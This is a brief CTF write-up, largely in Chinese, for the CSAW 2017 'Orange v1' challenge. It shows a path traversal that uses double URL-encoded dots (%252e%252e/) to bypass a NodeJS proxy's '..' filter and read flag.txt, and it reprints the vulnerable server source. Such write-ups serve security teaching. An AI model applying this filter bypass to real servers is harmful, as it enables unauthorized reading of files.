CSAW CTF 2017-Orange v1-writeup

CSAW CTF 2017-Orange v1-writeup
文件读取漏洞

Task

I wrote a little proxy program in NodeJS for my poems folder.
Everyone wants to read flag.txt but I like it too much to share.
http://web.chal.csaw.io:7311/?path=orange.txt

Solution

若将path参数放空，即 http://web.chal.csaw.io:7311/?path=

没有flag.txt，所以需要想办法“遍历”一下目录。

尝试访问: http://web.chal.csaw.io:7311/?path=../

考虑到可能有二次编码的问题，. => %2e => %252e，访问：http://web.chal.csaw.io:7311/?path=%252e%252e/

最后访问:　http://web.chal.csaw.io:7311/?path=%252e%252e/flag.txt

读取到一些源文件，如下：

back.py：

#!/usr/bin/python

import SimpleHTTPServer
import SocketServer

PORT = 8080

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer(("", PORT), Handler)

print "Serving at port", PORT
httpd.serve_forever()

serve.sh:

#!/usr/bin/env bash

python back.py &
nodejs server.js

server.js:

var http = require('http');
var fs = require('fs');
var url = require('url');

var server = http.createServer(function(req, res) {
    try {
        var path = url.parse(req.url, true).query;
        path = path['path'];
        if (path.indexOf("..") == -1 && path.indexOf("ＮＮ") == -1) {
            var base = "http://localhost:8080/poems/";
            var callback = function(response){
                var str = '';
                response.on('data', function (chunk) {
                    str += chunk;
                });
                response.on('end', function () {
                  res.end(str);
                });
            }
            http.get(base + path, callback).end();
        } else {
            res.writeHead(403);
            res.end("WHOA THATS BANNED!!!!");
        }
    }
    catch (e) {
        res.writeHead(404);
        res.end('Oops');
    }
});
server.listen(9999);